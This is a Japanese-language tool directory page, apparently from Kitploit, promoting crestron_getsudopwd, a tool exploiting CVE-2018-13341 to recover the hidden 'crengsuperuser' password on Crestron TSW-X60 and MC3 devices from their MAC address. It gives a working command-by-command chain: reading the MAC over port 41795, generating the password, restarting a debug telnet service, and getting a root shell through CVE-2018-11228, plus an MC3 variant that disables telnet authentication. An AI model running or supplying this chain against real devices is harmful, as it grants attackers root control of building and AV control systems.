Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
crestron_getsudopwd — CVE-2018-13341を悪用して、Crestronデバイスの隠しアカウントパスワードを回復するツール | Kitploit
ツール/GitHubGitHub/axcheron/crestron_getsudopwd
組み込みシステムセキュリティパスワードクラッキング脆弱性分析エクスプロイトペネトレーションテストハードウェアセキュリティレッドチーミング
GitHubaxcheron/crestron_getsudopwd

crestron_getsudopwd

CVE-2018-13341を悪用して、Crestronデバイスの隠しアカウントパスワードを回復するツール

リポジトリを見る
2666年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

crestron_getsudopwd

Ricky Lawshae による Crestron TSW-X60 および MC3 デバイスでの発見に基づき、このツールは CVE-2018-13341 を悪用することを目的としています。対象デバイスの MAC アドレスを使用して、昇格された特権を持ち SUDO コマンドを実行できる "crengsuperuser" 非表示アカウントのパスワードを復元できます。

説明

Crestron TSW-X60 < 2.001.0037.001 および MC3 < 1.502.0047.00 では、特別な sudo アカウントのパスワードが、通常のユーザー権限でアクセス可能な情報を使用して計算される可能性があります。攻撃者はこれらのパスワードを解読できる可能性があり、それにより非表示の API 呼び出しを実行し、昇格された特権で CTP コンソールのサンドボックス環境から脱出できる可能性があります。

Crestron Toolbox Protocol (CTP) は、TSW-XX60 デバイスのポート 41795 にアクセスすることで接続できます。次に、estat コマンドを使用してデバイスの MAC アドレスを取得できます:

root@kitploit:~
$ nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

要件

このツールには cryptography モジュールが必要です。

root@kitploit:~
$ pip3 install cryptography

または

root@kitploit:~
$ pip3 install -r requirements.txt

はじめに

root@kitploit:~
usage: crestron_getsudopwd.py [-h] [-m MAC]

Tool to generate Crestron hidden accounts passwords

optional arguments:
  -h, --help         show this help message and exit
  -m MAC, --mac MAC  Target MAC address (w/o colons or dots)


# Example
$ python3 crestron_getsudopwd.py -m aabbccddeeff
[*] Device MAC address: AABBCCDDEEFF
[*] Password for 'crengsuperuser': RgXkA6Q415puxN0t

CVE-2018-11228 の悪用

CVE-2018-11228 は、Crestron Terminal Protocol (CTP) の Bash Shell Service を介した認証不要の RCE を可能にします。"crengsuperuser" 非表示アカウントのパスワードを取得すると、基盤となる Linux ボックスで root アクセスを取得できます。

root@kitploit:~
$ nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

次に、新しいシェルで、ボックスへの root アクセスを取得できます。

root@kitploit:~
$ telnet w.x.y.z

bash-3.2# whoami
root

注記: この例は TSW デバイス用です。MC3 デバイスでは手順が少し異なります。シェルを有効にするには、次のコマンドを使用する必要があります:SUDO -SN:crengsuperuser -SP:password REGEDIT \\comm\\telnetd addval UseAuthentication DWORD 0 次に、SUDO -SN:crengsuperuser -SP:password LAUNCH \\windows\\services.exe /params start tel0:

リソース

この脆弱性に関連する参考リソースは次のとおりです:

  • Crestron TSW-XX60 タッチパネルデバイスに関するセキュリティアドバイザリ
  • Ricky "HeadlessZeke" Lawshae - Github
  • Crestron IoT オートメーションシステムのハッキング - DEFCON 26
ツールをダウンロード